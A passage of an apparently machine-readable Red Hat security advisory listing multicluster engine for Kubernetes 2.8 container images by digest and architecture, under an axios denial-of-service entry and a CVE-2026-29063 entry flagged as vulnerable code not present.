"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-29063",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-03-06T19:00:57.982727+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445291"
}
],
"notes": [
{
"category": "description",
